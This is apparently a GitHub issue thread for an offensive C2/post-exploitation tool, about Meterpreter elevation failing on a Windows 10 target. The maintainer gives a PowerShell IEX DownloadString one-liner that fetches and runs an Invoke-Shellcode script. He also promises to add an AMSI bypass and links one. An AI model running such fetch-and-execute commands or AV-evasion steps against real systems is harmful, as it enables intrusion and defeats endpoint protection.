Payload not executing

[ghost]

Stager works but when trying to elevate to a meterpreter session the payload fails to execute. Generating a binary and executing it on the target machine works fine though.

[Charliedean]

Hi, Are you using the docker image or the install?

[ghost]

I'm using the docker image

[Charliedean]

Hi Nteiv,

I have just pulled the current docker version and tested it on Ubuntu and my Windows10 VM and can confirm that it is working for me. This could be an issue with your Windows environment.

Is there any AV running on the Windows device?

[nteiv]

It's a fresh Windows 10 Pro VM. There are no other antivirus solutions on the machine. As you can see the stager works and I'm able to get a reverse shell back and I'm also able to execute Powershell commands. But when trying to elevate to a Meterpreter session it just hangs. I've also tried running the custom shellcode execution module with a simple winexec calc.exe and, again, get nothing.

[Charliedean]

Ok. Based on this evidence it seems like there is an issue with invokeshellcode powershell module.

Could you please let me know your windows version: winver in Run dialog( WIN + R )

and also run the following in powershell:

IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/Charliedean/Invoke
Shellcode1803/master/Invoke-Shellcode.ps1")

This will download and import the invoke shellcode module temporarily. You can then test if its working by executing Invoke-Shellcode and accepting the prompt. If no errors, Calc.exe should open.

[nteiv]

That one-liner will get picked up my AMSI

so I'm guessing the program doesn't do any obfuscation either?

[Charliedean]

Hi nteiv,

I will look into implementing AMSI bypass on Monday. Thank you for bringing this to my attention. The following looks promising as somewhere to start: https://github.com/kmkz/Pentesting/blob/master/AMSI-Bypass.ps1